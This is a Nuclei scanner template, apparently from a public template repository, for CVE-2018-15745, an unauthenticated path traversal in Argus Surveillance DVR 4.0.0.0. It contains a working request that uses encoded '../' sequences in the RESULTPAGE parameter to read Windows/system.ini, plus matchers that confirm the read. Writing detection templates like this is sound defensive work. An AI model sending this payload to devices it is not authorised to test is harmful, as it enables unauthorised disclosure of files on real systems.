47 lines
1.6 KiB
YAML
47 lines
1.6 KiB
YAML
id: CVE-2018-15745
|
|
|
|
info:
|
|
name: Argus Surveillance DVR 4.0.0.0 - Local File Inclusion
|
|
author: gy741
|
|
severity: high
|
|
description: |
|
|
Argus Surveillance DVR 4.0.0.0 devices allow unauthenticated local file inclusion, leading to file disclosure via a ..%2F in the WEBACCOUNT.CGI RESULTPAGE parameter.
|
|
remediation: |
|
|
Upgrade to a patched version of Argus Surveillance DVR.
|
|
reference:
|
|
- http://hyp3rlinx.altervista.org/advisories/ARGUS-SURVEILLANCE-DVR-v4-UNAUTHENTICATED-PATH-TRAVERSAL-FILE-DISCLOSURE.txt
|
|
- http://packetstormsecurity.com/files/149134/Argus-Surveillance-DVR-4.0.0.0-Directory-Traversal.html
|
|
- https://www.exploit-db.com/exploits/45296/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2018-15745
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2018-15745
|
|
cwe-id: CWE-22
|
|
epss-score: 0.95179
|
|
epss-percentile: 0.99089
|
|
cpe: cpe:2.3:a:argussurveillance:dvr:4.0.0.0:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: argussurveillance
|
|
product: dvr
|
|
tags: packetstorm,edb,cve,cve2018,argussurveillance,lfi,dvr
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD="
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "for 16-bit app support"
|
|
- "[drivers]"
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|